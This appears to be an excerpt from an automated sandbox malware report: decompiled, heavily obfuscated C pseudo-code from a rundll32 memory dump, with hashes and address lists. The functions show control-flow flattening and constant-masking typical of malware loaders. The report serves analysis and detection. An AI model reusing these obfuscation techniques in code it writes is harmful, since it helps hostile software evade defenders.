                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000B.00000002.443285949.00000000002B1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                      • Associated: 0000000B.00000002.443281134.00000000002B0000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      • Associated: 0000000B.00000002.443300447.00000000002D5000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_11_2_2b0000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: 7h$;:$E%$FCEF$Xth$8$x
                                                                                                                      • API String ID: 0-4119786196
                                                                                                                      • Opcode ID: c98d2fa78fafc03330562ae8f228e283cb4abe412574e96c1f3e95e1750cf514
                                                                                                                      • Instruction ID: bf8a55e2c79f9a95218fac9cde296c8f9e4a19dbef8c3eef4a134aace420c917
                                                                                                                      • Opcode Fuzzy Hash: c98d2fa78fafc03330562ae8f228e283cb4abe412574e96c1f3e95e1750cf514
                                                                                                                      • Instruction Fuzzy Hash: 55220171509381DFD368CF25C54AA8BFBE2BBC5708F108A1DE2D986261D7B19959CF03
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      C-Code - Quality: 100%
                                                                                                                      			E002D146E(void* __ecx) {
                                                                                                                      				signed int _v4;
                                                                                                                      				signed int _v8;
                                                                                                                      				signed int _v12;
                                                                                                                      				signed int _v16;
                                                                                                                      				signed int _v20;
                                                                                                                      				signed int _v24;
                                                                                                                      				signed int _v28;
                                                                                                                      				signed int _v32;
                                                                                                                      				unsigned int _v36;
                                                                                                                      				unsigned int _v40;
                                                                                                                      				signed int _v44;
                                                                                                                      				unsigned int _v48;
                                                                                                                      				signed int _v52;
                                                                                                                      				unsigned int _v56;
                                                                                                                      				signed int _v60;
                                                                                                                      				signed int _v64;
                                                                                                                      				signed int _v68;
                                                                                                                      				signed int _v72;
                                                                                                                      				signed int _v76;
                                                                                                                      				signed int _v80;
                                                                                                                      				signed int _v84;
                                                                                                                      				signed int _v88;
                                                                                                                      				signed int _v92;
                                                                                                                      				signed int _v96;
                                                                                                                      				signed int _v100;
                                                                                                                      				signed int _v104;
                                                                                                                      				void* _t243;
                                                                                                                      				void* _t248;
                                                                                                                      				void* _t253;
                                                                                                                      				void* _t260;
                                                                                                                      				void* _t265;
                                                                                                                      				void* _t270;
                                                                                                                      				void* _t271;
                                                                                                                      				signed int _t273;
                                                                                                                      				signed int _t274;
                                                                                                                      				signed int _t275;
                                                                                                                      				signed int _t276;
                                                                                                                      				signed int _t277;
                                                                                                                      				signed int _t278;
                                                                                                                      				signed int _t279;
                                                                                                                      				void* _t298;
                                                                                                                      				void* _t299;
                                                                                                                      				signed int* _t301;
                                                                                                                      				void* _t309;
                                                                                                                      
                                                                                                                      				_t301 =  &_v104;
                                                                                                                      				_v4 = 0xac6d1;
                                                                                                                      				_v4 = _v4 | 0x81c51043;
                                                                                                                      				_v4 = _v4 ^ 0x81ca09c2;
                                                                                                                      				_v8 = 0xb8d74f;
                                                                                                                      				_v8 = _v8 | 0x3a2284f4;
                                                                                                                      				_v8 = _v8 ^ 0x3ab94f49;
                                                                                                                      				_v12 = 0x56dc2c;
                                                                                                                      				_v12 = _v12 >> 0xf;
                                                                                                                      				_v12 = _v12 ^ 0x0005485d;
                                                                                                                      				_v20 = 0x903a48;
                                                                                                                      				_v20 = _v20 ^ 0xb2572448;
                                                                                                                      				_v20 = _v20 ^ 0xb2cdfeb2;
                                                                                                                      				_v24 = 0x1df316;
                                                                                                                      				_v24 = _v24 * 0x26;
                                                                                                                      				_t271 = __ecx;
                                                                                                                      				_v24 = _v24 ^ 0x04774828;
                                                                                                                      				_t298 = 0;
                                                                                                                      				_v96 = 0x29fbe6;
                                                                                                                      				_t299 = 0x412d246;
                                                                                                                      				_v96 = _v96 << 0xd;
                                                                                                                      				_v96 = _v96 + 0x40e6;
                                                                                                                      				_v96 = _v96 + 0xf8d0;
                                                                                                                      				_v96 = _v96 ^ 0x3f79ed75;
                                                                                                                      				_v28 = 0x5f5eb9;
                                                                                                                      				_v28 = _v28 ^ 0x304beccc;
                                                                                                                      				_v28 = _v28 ^ 0x301ae6f7;
                                                                                                                      				_v16 = 0x707b25;
                                                                                                                      				_v16 = _v16 | 0xc66cf16b;
                                                                                                                      				_v16 = _v16 ^ 0xc674099c;
                                                                                                                      				_v68 = 0x422c76;
                                                                                                                      				_v68 = _v68 >> 5;
                                                                                                                      				_v68 = _v68 ^ 0x51e03a27;
                                                                                                                      				_v68 = _v68 ^ 0x51e925f4;
                                                                                                                      				_v72 = 0x838679;
                                                                                                                      				_t273 = 0x50;
                                                                                                                      				_v72 = _v72 / _t273;
                                                                                                                      				_t274 = 0xb;
                                                                                                                      				_v72 = _v72 / _t274;
                                                                                                                      				_v72 = _v72 ^ 0x0007ebfd;
                                                                                                                      				_v92 = 0x3398da;
                                                                                                                      				_t275 = 0x26;
                                                                                                                      				_v92 = _v92 * 0x6d;
                                                                                                                      				_v92 = _v92 ^ 0x75ca49c7;
                                                                                                                      				_v92 = _v92 << 6;
                                                                                                                      				_v92 = _v92 ^ 0x0c9e0967;
                                                                                                                      				_v48 = 0x734a11;
                                                                                                                      				_v48 = _v48 >> 0xa;
                                                                                                                      				_v48 = _v48 ^ 0x00076871;
                                                                                                                      				_v52 = 0xdc5b30;
                                                                                                                      				_v52 = _v52 ^ 0x2a73247b;
                                                                                                                      				_v52 = _v52 ^ 0x2aa1f0d2;
                                                                                                                      				_v104 = 0x2f7cf6;
                                                                                                                      				_v104 = _v104 / _t275;
                                                                                                                      				_v104 = _v104 * 0x41;
                                                                                                                      				_v104 = _v104 | 0xaae37d31;
                                                                                                                      				_v104 = _v104 ^ 0xaaffffad;
                                                                                                                      				_v56 = 0xefab9e;
                                                                                                                      				_v56 = _v56 >> 9;
                                                                                                                      				_v56 = _v56 ^ 0x0008ac09;
                                                                                                                      				_v80 = 0xd17701;
                                                                                                                      				_t276 = 0x57;
                                                                                                                      				_v80 = _v80 / _t276;
                                                                                                                      				_v80 = _v80 + 0xffff6938;
                                                                                                                      				_v80 = _v80 ^ 0x000bb913;
                                                                                                                      				_v44 = 0x9eed53;
                                                                                                                      				_t277 = 0x32;
                                                                                                                      				_v44 = _v44 * 0x74;
                                                                                                                      				_v44 = _v44 ^ 0x480bdaeb;
                                                                                                                      				_v100 = 0xb1cacc;
                                                                                                                      				_v100 = _v100 ^ 0xb6415150;
                                                                                                                      				_v100 = _v100 / _t277;
                                                                                                                      				_t278 = 0x13;
                                                                                                                      				_v100 = _v100 * 0x1c;
                                                                                                                      				_v100 = _v100 ^ 0x667becf7;
                                                                                                                      				_v84 = 0x7272f5;
                                                                                                                      				_v84 = _v84 | 0x49285dda;
                                                                                                                      				_v84 = _v84 / _t278;
                                                                                                                      				_v84 = _v84 ^ 0x03db0e7b;
                                                                                                                      				_v32 = 0x23e0bb;
                                                                                                                      				_v32 = _v32 ^ 0xc1a40ef0;
                                                                                                                      				_v32 = _v32 ^ 0xc18ab8c7;
                                                                                                                      				_v36 = 0x934e6;
                                                                                                                      				_v36 = _v36 >> 8;
                                                                                                                      				_v36 = _v36 ^ 0x000f952f;
                                                                                                                      				_v76 = 0x57f010;
                                                                                                                      				_t279 = 0x55;
                                                                                                                      				_v76 = _v76 / _t279;
                                                                                                                      				_v76 = _v76 | 0x3f39553c;
                                                                                                                      				_v76 = _v76 ^ 0x3f3ef260;
                                                                                                                      				_v40 = 0x93d6f8;
                                                                                                                      				_v40 = _v40 >> 6;
                                                                                                                      				_v40 = _v40 ^ 0x000a0563;
                                                                                                                      				_v60 = 0x62e666;
                                                                                                                      				_v60 = _v60 ^ 0x6bd8a41b;
                                                                                                                      				_v60 = _v60 * 0x61;
                                                                                                                      				_v60 = _v60 ^ 0xd19d18b1;
                                                                                                                      				_v88 = 0xe2190a;
                                                                                                                      				_v88 = _v88 * 0x56;
                                                                                                                      				_v88 = _v88 << 0x10;
                                                                                                                      				_v88 = _v88 * 0x2c;
                                                                                                                      				_v88 = _v88 ^ 0x1bd8b0be;
                                                                                                                      				_v64 = 0x7df3ba;
                                                                                                                      				_v64 = _v64 >> 3;
                                                                                                                      				_v64 = _v64 << 8;
                                                                                                                      				_v64 = _v64 ^ 0x0fbc3045;
                                                                                                                      				goto L1;
                                                                                                                      				do {
                                                                                                                      					while(1) {
                                                                                                                      						L1:
                                                                                                                      						_t309 = _t299 - 0x5b9992e;
                                                                                                                      						if(_t309 > 0) {
                                                                                                                      							break;
                                                                                                                      						}
                                                                                                                      						if(_t309 == 0) {
                                                                                                                      							_t253 = E002C274F();
                                                                                                                      							_t301 = _t301 - 0xc + 0xc;
                                                                                                                      							_t299 = 0x4369ff;
                                                                                                                      							_t298 = _t298 + _t253;
                                                                                                                      							continue;
                                                                                                                      						} else {
                                                                                                                      							if(_t299 == 0x4369ff) {
                                                                                                                      								_t298 = _t298 + E002BB782(_t271 + 0x1c, _v60, _v88, _v64);
                                                                                                                      							} else {
                                                                                                                      								if(_t299 == 0x240c704) {
                                                                                                                      									_t260 = E002C274F();
                                                                                                                      									_t301 = _t301 - 0xc + 0xc;
                                                                                                                      									_t299 = 0x5b9992e;
                                                                                                                      									_t298 = _t298 + _t260;
                                                                                                                      									continue;
                                                                                                                      								} else {
                                                                                                                      									if(_t299 == 0x412d246) {
                                                                                                                      										_t299 = 0x80cf0f0;
                                                                                                                      										continue;
                                                                                                                      									} else {
                                                                                                                      										if(_t299 != 0x47dcd1e) {
                                                                                                                      											goto L17;
                                                                                                                      										} else {
                                                                                                                      											_t265 = E002C274F();
                                                                                                                      											_t301 = _t301 - 0xc + 0xc;
                                                                                                                      											_t299 = 0x240c704;
                                                                                                                      											_t298 = _t298 + _t265;
                                                                                                                      											continue;
                                                                                                                      										}
                                                                                                                      									}
                                                                                                                      								}
                                                                                                                      							}
                                                                                                                      						}
                                                                                                                      						L20:
                                                                                                                      						return _t298;
                                                                                                                      					}
                                                                                                                      					if(_t299 == 0x80cf0f0) {
                                                                                                                      						_t243 = E002BB782(_t271 + 8, _v4, _v8, _v12);
                                                                                                                      						_t301 =  &(_t301[2]);
                                                                                                                      						_t299 = 0xe2e5f52;
                                                                                                                      						_t298 = _t298 + _t243;
                                                                                                                      						goto L17;
                                                                                                                      					} else {
                                                                                                                      						if(_t299 == 0xa9f5c45) {
                                                                                                                      							_t248 = E002C274F();
                                                                                                                      							_t301 = _t301 - 0xc + 0xc;
                                                                                                                      							_t299 = 0x47dcd1e;
                                                                                                                      							_t298 = _t298 + _t248;
                                                                                                                      							goto L1;
                                                                                                                      						} else {
                                                                                                                      							if(_t299 != 0xe2e5f52) {
                                                                                                                      								goto L17;
                                                                                                                      							} else {
                                                                                                                      								_t270 = E002C274F();
                                                                                                                      								_t301 = _t301 - 0xc + 0xc;
                                                                                                                      								_t299 = 0xa9f5c45;
                                                                                                                      								_t298 = _t298 + _t270;
                                                                                                                      								goto L1;
                                                                                                                      							}
                                                                                                                      						}
                                                                                                                      					}
                                                                                                                      					goto L20;
                                                                                                                      					L17:
                                                                                                                      				} while (_t299 != 0xe1ba840);
                                                                                                                      				goto L20;
                                                                                                                      			}















































                                                                                                                      0x002d17b7
                                                                                                                      0x002d17e9
                                                                                                                      0x00000000
                                                                                                                      0x002d17b9
                                                                                                                      0x002d17bf
                                                                                                                      0x00000000
                                                                                                                      0x002d17c5
                                                                                                                      0x002d17d8
                                                                                                                      0x002d17dd
                                                                                                                      0x002d17e0
                                                                                                                      0x002d17e5
                                                                                                                      0x00000000
                                                                                                                      0x002d17e5
                                                                                                                      0x002d17bf
                                                                                                                      0x002d17b7
                                                                                                                      0x002d17af
                                                                                                                      0x002d17a3
                                                                                                                      0x002d18e3
                                                                                                                      0x002d18ec
                                                                                                                      0x002d18ec
                                                                                                                      0x002d183e
                                                                                                                      0x002d18ad
                                                                                                                      0x002d18b2
                                                                                                                      0x002d18b5
                                                                                                                      0x002d18ba
                                                                                                                      0x00000000
                                                                                                                      0x002d1840
                                                                                                                      0x002d1846
                                                                                                                      0x002d188a
                                                                                                                      0x002d188f
                                                                                                                      0x002d1892
                                                                                                                      0x002d1897
                                                                                                                      0x00000000
                                                                                                                      0x002d1848
                                                                                                                      0x002d184e
                                                                                                                      0x00000000
                                                                                                                      0x002d1850
                                                                                                                      0x002d1863
                                                                                                                      0x002d1868
                                                                                                                      0x002d186b
                                                                                                                      0x002d1870
                                                                                                                      0x00000000
                                                                                                                      0x002d1870
                                                                                                                      0x002d184e
                                                                                                                      0x002d1846
                                                                                                                      0x00000000
                                                                                                                      0x002d18bc
                                                                                                                      0x002d18bc
                                                                                                                      0x00000000

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000B.00000002.443285949.00000000002B1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                      • Associated: 0000000B.00000002.443281134.00000000002B0000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      • Associated: 0000000B.00000002.443300447.00000000002D5000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_11_2_2b0000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: %{p$':Q$<U9?$fb$uy?${$s*$4
                                                                                                                      • API String ID: 0-3558008229
                                                                                                                      • Opcode ID: 84da1592223dd1f04f0f3a6d750a6106e25ec91bc4b6139091f670668cf43936
                                                                                                                      • Instruction ID: 13e0fc8fddd54d1d6b9adbc24ab2554d40c5b687b082d5cddca6e83edab5458e
                                                                                                                      • Opcode Fuzzy Hash: 84da1592223dd1f04f0f3a6d750a6106e25ec91bc4b6139091f670668cf43936
                                                                                                                      • Instruction Fuzzy Hash: 41B143729183819FC348DF69D48A40BFBF1BBD4348F104A2EF4959A220D7B4DA58CF86
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      C-Code - Quality: 78%
                                                                                                                      			E002B194C(void* __ecx, signed int __edx, void* __edi, void* __eflags, signed int _a4, intOrPtr _a8, char _a12, intOrPtr _a16, intOrPtr _a20) {
                                                                                                                      				signed int _v12;
                                                                                                                      				signed int _v16;
                                                                                                                      				signed int _v20;
                                                                                                                      				signed int _v24;
                                                                                                                      				signed int _v28;
                                                                                                                      				signed int _v32;
                                                                                                                      				signed int _v36;
                                                                                                                      				signed int _v40;
                                                                                                                      				signed int _v44;
                                                                                                                      				signed int _v48;
                                                                                                                      				signed int _v52;
                                                                                                                      				signed int _v56;
                                                                                                                      				signed int _v60;
                                                                                                                      				signed int _v64;
                                                                                                                      				signed int _v68;
                                                                                                                      				signed int _v72;
                                                                                                                      				signed int _v76;
                                                                                                                      				signed int _v80;
                                                                                                                      				signed int _v84;
                                                                                                                      				unsigned int _v88;
                                                                                                                      				signed int _v92;
                                                                                                                      				signed int _v96;
                                                                                                                      				signed int _v100;
                                                                                                                      				signed int _v104;
                                                                                                                      				signed int _v108;
                                                                                                                      				signed int _v112;
                                                                                                                      				signed int _v116;
                                                                                                                      				signed int _v120;
                                                                                                                      				signed int _v124;
                                                                                                                      				signed int _v128;
                                                                                                                      				signed int _v132;
                                                                                                                      				signed int _v136;
                                                                                                                      				signed int _v140;
                                                                                                                      				signed int _v144;
                                                                                                                      				signed int _v148;
                                                                                                                      				signed int _v152;
                                                                                                                      				intOrPtr _v156;
                                                                                                                      				char _v176;
                                                                                                                      				short _v720;
                                                                                                                      				short _v722;
                                                                                                                      				char _v724;
                                                                                                                      				signed int _v768;
                                                                                                                      				char _v1288;
                                                                                                                      				char _v1808;
                                                                                                                      				void* _t336;
                                                                                                                      				signed int _t361;
                                                                                                                      				intOrPtr _t370;
                                                                                                                      				void* _t373;
                                                                                                                      				signed int _t379;
                                                                                                                      				signed int _t394;
                                                                                                                      				void* _t407;
                                                                                                                      				signed int _t422;
                                                                                                                      				signed int _t423;
                                                                                                                      				signed int _t424;
                                                                                                                      				signed int _t425;
                                                                                                                      				signed int _t426;
                                                                                                                      				signed int _t427;
                                                                                                                      				void* _t434;
                                                                                                                      				void* _t435;
                                                                                                                      				void* _t436;
                                                                                                                      
                                                                                                                      				_t394 = __edx ^  *(__edi + 3);
                                                                                                                      				asm("int 0x55");
                                                                                                                      				_t435 = _t434 - 0x710;
                                                                                                                      				_t370 = _a8;
                                                                                                                      				_push(__edi);
                                                                                                                      				_push(_a20);
                                                                                                                      				if(__eflags == 0) {
                                                                                                                      					_push(_a16);
                                                                                                                      					_push(_a12);
                                                                                                                      					_push(_t370);
                                                                                                                      					_push(_a4);
                                                                                                                      					_push(_t394);
                                                                                                                      					_push(__ecx);
                                                                                                                      					E002BCF25(_t336);
                                                                                                                      					_v16 = 0x6f572e;
                                                                                                                      				}
                                                                                                                      				_t436 = _t435 + 0x1c;
                                                                                                                      				_v16 = _v16 >> 0xb;
                                                                                                                      				_v16 = _v16 + 0xd52f;
                                                                                                                      				_t373 = 0x80f983c;
                                                                                                                      				_v16 = _v16 ^ 0x3310f03a;
                                                                                                                      				_v16 = _v16 ^ 0x33101333;
                                                                                                                      				_v60 = 0xed71dd;
                                                                                                                      				_v60 = _v60 ^ 0x2497a453;
                                                                                                                      				_t422 = 0x26;
                                                                                                                      				_v60 = _v60 * 0x72;
                                                                                                                      				_v60 = _v60 ^ 0x3eb60fda;
                                                                                                                      				_v112 = 0xa5b0b2;
                                                                                                                      				_v112 = _v112 + 0x8954;
                                                                                                                      				_v112 = _v112 ^ 0x00ada628;
                                                                                                                      				_v108 = 0xe5587e;
                                                                                                                      				_v108 = _v108 << 9;
                                                                                                                      				_v108 = _v108 ^ 0xcab3bbf0;
                                                                                                                      				_v92 = 0x4845fb;
                                                                                                                      				_v92 = _v92 + 0x365f;
                                                                                                                      				_v92 = _v92 + 0xdd1a;
                                                                                                                      				_v92 = _v92 ^ 0x004e95c0;
                                                                                                                      				_v88 = 0xa51f24;
                                                                                                                      				_v88 = _v88 ^ 0x4dc3992d;
                                                                                                                      				_v88 = _v88 >> 9;
                                                                                                                      				_v88 = _v88 ^ 0x002183c7;
                                                                                                                      				_v28 = 0x92b1f2;
                                                                                                                      				_v28 = _v28 + 0xdb28;
                                                                                                                      				_v28 = _v28 ^ 0xc5c4fb2d;
                                                                                                                      				_v28 = _v28 + 0xffff07a3;
                                                                                                                      				_v28 = _v28 ^ 0xc5543e55;
                                                                                                                      				_v56 = 0x45fcf7;
                                                                                                                      				_v56 = _v56 ^ 0x18f8a820;
                                                                                                                      				_v56 = _v56 / _t422;
                                                                                                                      				_v56 = _v56 ^ 0x00a79737;
                                                                                                                      				_v72 = 0xd5567a;
                                                                                                                      				_v72 = _v72 ^ 0x96c46f64;
                                                                                                                      				_v72 = _v72 + 0x1123;
                                                                                                                      				_v72 = _v72 ^ 0x96131221;
                                                                                                                      				_v128 = 0xd7fcd2;
                                                                                                                      				_v128 = _v128 | 0x19fc7ba7;
                                                                                                                      				_v128 = _v128 ^ 0x19f2013f;
                                                                                                                      				_v36 = 0xb63dda;
                                                                                                                      				_v36 = _v36 | 0x57c3443c;
                                                                                                                      				_v36 = _v36 >> 0xf;
                                                                                                                      				_v36 = _v36 >> 2;
                                                                                                                      				_v36 = _v36 ^ 0x000375d9;
                                                                                                                      				_v120 = 0x9784e5;
                                                                                                                      				_v120 = _v120 ^ 0x5442b457;
                                                                                                                      				_v120 = _v120 ^ 0x54d2e3fe;
                                                                                                                      				_v152 = 0x86b47c;
                                                                                                                      				_v152 = _v152 | 0x1a648f0d;
                                                                                                                      				_v152 = _v152 ^ 0x1ae2f95e;
                                                                                                                      				_v104 = 0xe16033;
                                                                                                                      				_v104 = _v104 + 0xffff0503;
                                                                                                                      				_v104 = _v104 ^ 0x00e7872e;
                                                                                                                      				_v140 = 0x7ced29;
                                                                                                                      				_v140 = _v140 + 0x937a;
                                                                                                                      				_v140 = _v140 ^ 0x00718bd8;
                                                                                                                      				_v148 = 0xa848b7;
                                                                                                                      				_v148 = _v148 ^ 0xa8d47762;
                                                                                                                      				_v148 = _v148 ^ 0xa87b6210;
                                                                                                                      				_v124 = 0xc4055c;
                                                                                                                      				_v124 = _v124 << 5;
                                                                                                                      				_v124 = _v124 ^ 0x1882bddf;
                                                                                                                      				_v80 = 0x58e97;
                                                                                                                      				_t423 = 0x7c;
                                                                                                                      				_v80 = _v80 / _t423;
                                                                                                                      				_v80 = _v80 + 0xffff9366;
                                                                                                                      				_v80 = _v80 ^ 0xfffe01cd;
                                                                                                                      				_v48 = 0x77db93;
                                                                                                                      				_t424 = 0x3a;
                                                                                                                      				_v48 = _v48 / _t424;
                                                                                                                      				_v48 = _v48 + 0xffffa5b4;
                                                                                                                      				_v48 = _v48 >> 6;
                                                                                                                      				_v48 = _v48 ^ 0x00036e08;
                                                                                                                      				_v132 = 0x4854bc;
                                                                                                                      				_t425 = 0x4c;
                                                                                                                      				_v132 = _v132 * 0x24;
                                                                                                                      				_v132 = _v132 ^ 0x0a23127f;
                                                                                                                      				_v84 = 0x297997;
                                                                                                                      				_v84 = _v84 / _t425;
                                                                                                                      				_t426 = 0x45;
                                                                                                                      				_v84 = _v84 * 0x5e;
                                                                                                                      				_v84 = _v84 ^ 0x003e8360;
                                                                                                                      				_v24 = 0xba7a12;
                                                                                                                      				_v24 = _v24 << 9;
                                                                                                                      				_v24 = _v24 ^ 0x8e2fa782;
                                                                                                                      				_v24 = _v24 + 0xffffcaa3;
                                                                                                                      				_v24 = _v24 ^ 0xfad920cc;
                                                                                                                      				_v64 = 0xf87d94;
                                                                                                                      				_v64 = _v64 >> 3;
                                                                                                                      				_v64 = _v64 >> 4;
                                                                                                                      				_v64 = _v64 ^ 0x0002c2de;
                                                                                                                      				_v68 = 0x627eea;
                                                                                                                      				_v68 = _v68 >> 0xe;
                                                                                                                      				_v68 = _v68 | 0x4b478a8f;
                                                                                                                      				_v68 = _v68 ^ 0x4b4b50ae;
                                                                                                                      				_v32 = 0x4d9af3;
                                                                                                                      				_v32 = _v32 + 0xffff3fdf;
                                                                                                                      				_v32 = _v32 | 0x07023235;
                                                                                                                      				_v32 = _v32 ^ 0xa9cb8ace;
                                                                                                                      				_v32 = _v32 ^ 0xae825d6e;
                                                                                                                      				_v144 = 0x2c231c;
                                                                                                                      				_v144 = _v144 ^ 0x372f588c;
                                                                                                                      				_v144 = _v144 ^ 0x37050cc1;
                                                                                                                      				_v40 = 0xed36d5;
                                                                                                                      				_v40 = _v40 / _t426;
                                                                                                                      				_v40 = _v40 + 0xffff2e56;
                                                                                                                      				_v40 = _v40 * 0xd;
                                                                                                                      				_v40 = _v40 ^ 0x002f5a10;
                                                                                                                      				_v20 = 0xb226b9;
                                                                                                                      				_v20 = _v20 << 5;
                                                                                                                      				_v20 = _v20 ^ 0x7ec33512;
                                                                                                                      				_v20 = _v20 ^ 0x86eef9df;
                                                                                                                      				_v20 = _v20 ^ 0xee6f0a5e;
                                                                                                                      				_v76 = 0xa2d2;
                                                                                                                      				_v76 = _v76 + 0xffff2403;
                                                                                                                      				_v76 = _v76 + 0xffff5c56;
                                                                                                                      				_v76 = _v76 ^ 0xfff84be5;
                                                                                                                      				_v12 = 0x61529e;
                                                                                                                      				_v12 = _v12 + 0x826f;
                                                                                                                      				_v12 = _v12 | 0x315ab852;
                                                                                                                      				_v12 = _v12 >> 0xa;
                                                                                                                      				_v12 = _v12 ^ 0x0008d08d;
                                                                                                                      				_v136 = 0xbe89c0;
                                                                                                                      				_v136 = _v136 ^ 0x9f3b785a;
                                                                                                                      				_v136 = _v136 ^ 0x9f8a2ffd;
                                                                                                                      				_v116 = 0x9615af;
                                                                                                                      				_v116 = _v116 | 0x7dcb4113;
                                                                                                                      				_v116 = _v116 ^ 0x7dd5a359;
                                                                                                                      				_v100 = 0x787e8d;
                                                                                                                      				_t427 = 0xf;
                                                                                                                      				_v100 = _v100 * 0x78;
                                                                                                                      				_v100 = _v100 ^ 0x3874d75c;
                                                                                                                      				_v96 = 0xce992e;
                                                                                                                      				_v96 = _v96 << 9;
                                                                                                                      				_v96 = _v96 | 0x5045bce0;
                                                                                                                      				_v96 = _v96 ^ 0xdd755c45;
                                                                                                                      				_v52 = 0xe3c541;
                                                                                                                      				_t419 = _v100;
                                                                                                                      				_v52 = _v52 / _t427;
                                                                                                                      				_v52 = _v52 + 0xffff4fb9;
                                                                                                                      				_v52 = _v52 | 0x0dbfd8b3;
                                                                                                                      				_v52 = _v52 ^ 0x0db5e533;
                                                                                                                      				_v44 = 0xd3f0eb;
                                                                                                                      				_v44 = _v44 | 0x02fbd4da;
                                                                                                                      				_v44 = _v44 >> 6;
                                                                                                                      				_v44 = _v44 + 0xffffa89e;
                                                                                                                      				_v44 = _v44 ^ 0x000772a1;
                                                                                                                      				while(1) {
                                                                                                                      					L6:
                                                                                                                      					_t407 = 0x2e;
                                                                                                                      					L7:
                                                                                                                      					while(_t373 != 0xcf103a) {
                                                                                                                      						if(_t373 == 0x80f983c) {
                                                                                                                      							_v156 = _t370;
                                                                                                                      							_t373 = 0xcf103a;
                                                                                                                      							continue;
                                                                                                                      						} else {
                                                                                                                      							if(_t373 == 0x8bdeaee) {
                                                                                                                      								__eflags = _v768 & _v16;
                                                                                                                      								if(__eflags == 0) {
                                                                                                                      									_t361 = _a16( &_v768,  &_v176);
                                                                                                                      									asm("sbb ecx, ecx");
                                                                                                                      									_t379 =  ~_t361 & 0x01058edd;
                                                                                                                      									goto L14;
                                                                                                                      								} else {
                                                                                                                      									__eflags = _v724 - _t407;
                                                                                                                      									if(_v724 != _t407) {
                                                                                                                      										L23:
                                                                                                                      										__eflags = _a4;
                                                                                                                      										if(__eflags != 0) {
                                                                                                                      											_push(_v48);
                                                                                                                      											_push(_v80);
                                                                                                                      											_push(0x2b1264);
                                                                                                                      											E002BE7CE(E002BAB66(_v148, _v124, __eflags), __eflags, _v132, _t370, _v148, _v84, _v24, _v64, _v68,  &_v724);
                                                                                                                      											_push(_v40);
                                                                                                                      											_push(_a16);
                                                                                                                      											_t311 =  &_a12; // 0xee6f0a5e
                                                                                                                      											_push( *_t311);
                                                                                                                      											_push( &_v1808);
                                                                                                                      											_push(_a4);
                                                                                                                      											L1();
                                                                                                                      											_t436 = _t436 + 0x40;
                                                                                                                      											_t361 = E002BAE03(_v20, _v76, _v12, _t364);
                                                                                                                      											_t407 = 0x2e;
                                                                                                                      										}
                                                                                                                      									} else {
                                                                                                                      										__eflags = _v722;
                                                                                                                      										if(__eflags != 0) {
                                                                                                                      											__eflags = _v722 - _t407;
                                                                                                                      											if(_v722 != _t407) {
                                                                                                                      												goto L23;
                                                                                                                      											} else {
                                                                                                                      												__eflags = _v720;
                                                                                                                      												if(__eflags != 0) {
                                                                                                                      													goto L23;
                                                                                                                      												}
                                                                                                                      											}
                                                                                                                      										}
                                                                                                                      									}
                                                                                                                      									_t373 = 0xfa4bede;
                                                                                                                      									continue;
                                                                                                                      								}
                                                                                                                      								L32:
                                                                                                                      							} else {
                                                                                                                      								if(_t373 == 0x8fff290) {
                                                                                                                      									_t361 = E002CBAEA( &_v1288, _v152,  &_v768, _v104, _v140);
                                                                                                                      									_t419 = _t361;
                                                                                                                      									_t436 = _t436 + 0xc;
                                                                                                                      									__eflags = _t361 - 0xffffffff;
                                                                                                                      									if(__eflags != 0) {
                                                                                                                      										_t373 = 0x8bdeaee;
                                                                                                                      										goto L6;
                                                                                                                      									}
                                                                                                                      								} else {
                                                                                                                      									if(_t373 == 0xe9f3001) {
                                                                                                                      										_t361 = E002C8C35(_v100, _t419, _v96, _v52, _v44);
                                                                                                                      									} else {
                                                                                                                      										if(_t373 != 0xfa4bede) {
                                                                                                                      											L28:
                                                                                                                      											__eflags = _t373 - 0x71f77cc;
                                                                                                                      											if(__eflags != 0) {
                                                                                                                      												continue;
                                                                                                                      											} else {
                                                                                                                      											}
                                                                                                                      										} else {
                                                                                                                      											_t278 =  &_v768; // 0x15f5595f
                                                                                                                      											_t361 = E002CF7FC(_v136, _t419, _v116, _t278);
                                                                                                                      											asm("sbb ecx, ecx");
                                                                                                                      											_t379 =  ~_t361 & 0xfa1ebaed;
                                                                                                                      											L14:
                                                                                                                      											_t373 = _t379 + 0xe9f3001;
                                                                                                                      											while(1) {
                                                                                                                      												L6:
                                                                                                                      												_t407 = 0x2e;
                                                                                                                      												goto L7;
                                                                                                                      											}
                                                                                                                      										}
                                                                                                                      									}
                                                                                                                      								}
                                                                                                                      							}
                                                                                                                      						}
                                                                                                                      						return _t361;
                                                                                                                      						goto L32;
                                                                                                                      					}
                                                                                                                      					_push(_v92);
                                                                                                                      					_push(_v108);
                                                                                                                      					_push(0x2b12d4);
                                                                                                                      					E002B3BF8(_v28, __eflags, E002BAB66(_v60, _v112, __eflags), _v56, _v72,  &_v1288, _t370);
                                                                                                                      					E002BAE03(_v128, _v36, _v120, _t354);
                                                                                                                      					_t436 = _t436 + 0x28;
                                                                                                                      					_t373 = 0x8fff290;
                                                                                                                      					_t407 = 0x2e;
                                                                                                                      					goto L28;
                                                                                                                      				}
                                                                                                                      			}
                                                                                                                      0x002b1a5f
                                                                                                                      0x002b1a66
                                                                                                                      0x002b1a6d
                                                                                                                      0x002b1a74
                                                                                                                      0x002b1a7b
                                                                                                                      0x002b1a82
                                                                                                                      0x002b1a89
                                                                                                                      0x002b1a90
                                                                                                                      0x002b1a97
                                                                                                                      0x002b1a9b
                                                                                                                      0x002b1a9f
                                                                                                                      0x002b1aa6
                                                                                                                      0x002b1aad
                                                                                                                      0x002b1ab4
